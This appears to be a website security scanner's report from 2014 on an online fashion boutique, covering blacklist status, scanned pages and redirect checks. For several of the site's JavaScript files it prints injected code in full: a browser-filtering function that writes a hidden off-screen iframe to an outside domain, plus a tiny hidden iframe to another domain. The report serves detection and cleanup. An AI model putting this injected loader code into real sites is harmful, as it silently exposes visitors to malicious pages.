Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adornosfashionboutique.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adornosfashionboutique.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://adornosfashionboutique.com/ | 200 OK Content-Length: 25480 Content-Type: text/html | clean |
http://adornosfashionboutique.com/media/system/js/caption.js | 200 OK Content-Length: 2766 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var capti ...[1301 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/templates/hot_fashionstore/js/jquery.min.js | 200 OK Content-Length: 85165 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: rubikaslas.indigoleap.com /* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function Showcontentid() { var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt *//*! * jQuery JavaScript Library v1.5 * http://jquery.com/ * * Copyright 2011, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/ ...[3332 bytes skipped]... Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/templates/hot_fashionstore/js/height.js | 200 OK Content-Length: 1063 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); jQuery(document).ready(function(){ var left_height = jQuery("#content_main").innerHeight(); jQuery("#column_left_c").css({height: left_height-95}); if(jQuery.browser.msie && jQuery.browser.version <= 7) jQuery("#column_left_c").css('margin-bottom',- ...[166 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/modules/mod_virtuemart_s5_dropdown_cart/s5_dropdown/s5_dropdown.js | 200 OK Content-Length: 6372 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); var clicked_dd = 0; var s5_opening = 0; var s5_closing = 0; var dd_height2 = 0; var s5_browser=navigator.appName; function s5_dd_close_check() { if (document.getElementById("s5_dropdowncart").offsetHeight != " ...[3884 bytes skipped]... Decoded script: ...[14209 bytes skipped]... ,'s5_dropdowncart') changeOpac(2,'s5_dropdowncart') /*** called setTimeout with changeOpac(2,'s5_dropdowncart'), 0 */ changeOpac(1,'s5_dropdowncart') changeOpac(1,'s5_dropdowncart') /*** called setTimeout with changeOpac(1,'s5_dropdowncart'), 0 */ changeOpac(0,'s5_dropdowncart') changeOpac(0,'s5_dropdowncart') /*** called setTimeout with changeOpac(0,'s5_dropdowncart'), 0 */ <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe><iframe src="http://satemploys.ru/Themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/modules/mod_hot_effects_rotator/js/jquery.nivo.slider.js | 200 OK Content-Length: 13217 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); (function(jQuery) { jQuery.fn.nivoSlider = function(options) { var currentSlide = 0; var currentImage = ''; var totalSlides = 0; var randAnim = ''; var running = false; var paused = false; ...[3709 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/index.php | 200 OK Content-Length: 25492 Content-Type: text/html | clean |
http://adornosfashionboutique.com/index.php?option=com_content&view=article&id=36&Itemid=149 | 200 OK Content-Length: 33309 Content-Type: text/html | clean |
http://adornosfashionboutique.com/components/com_acymailing/js/acymailing_module.js | 200 OK Content-Length: 2606 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); function submitacymailingform(task,formName){ var varform = eval('document.'+formName); if(!varform.elements) varform = varform[1]; if(task != 'optout'){ nameField = varform.elements['user[name]']; if(nameField && ...[1897 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe><iframe src="http://satemploys.ru/Themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://adornosfashionboutique.com/plugins/content/scrollingsharebutton/float.js | 200 OK Content-Length: 6085 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); (function($){ function FloatObject(jqObj, params) { this.jqObj = jqObj; switch(params.speed) { case 'fast': this.steps = 5; break; case 'normal': this.steps = 10; break; case 'slow': this.steps = 20; brea ...[3804 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/index.php?option=com_content&view=article&id=36&Itemid=40 | 200 OK Content-Length: 32388 Content-Type: text/html | clean |
http://adornosfashionboutique.com/modules/mod_xmlswf_vm_royalgallery/AC_RunActiveContent.js | 200 OK Content-Length: 9124 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVers ...[3786 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe><iframe src="http://satemploys.ru/Themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/index.php?option=com_content&view=article&id=39&Itemid=111 | 200 OK Content-Length: 31714 Content-Type: text/html | clean |
http://adornosfashionboutique.com/index.php?page=shop.cart&option=com_virtuemart&Itemid=159 | 200 OK Content-Length: 27816 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adornosfashionboutique.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 06 Sep 2014 08:32:23 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 06 Sep 2014 08:32:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 82c1c218487c9702c6f376cfaaaef8e3=3f2g38qko37a03khc522ik1i75; path=/
Set-Cookie: virtuemart=3f2g38qko37a03khc522ik1i75
GET / HTTP/1.1
Host: adornosfashionboutique.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 06 Sep 2014 08:32:23 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 06 Sep 2014 08:32:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 82c1c218487c9702c6f376cfaaaef8e3=3f2g38qko37a03khc522ik1i75; path=/
Set-Cookie: virtuemart=3f2g38qko37a03khc522ik1i75
Second query (visit from search engine):
GET / HTTP/1.1
Host: adornosfashionboutique.com
Referer: http://www.google.com/search?q=adornosfashionboutique.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: adornosfashionboutique.com
Referer: http://www.google.com/search?q=adornosfashionboutique.com
Result:
The result is similar to the first query. There are no suspicious redirects found.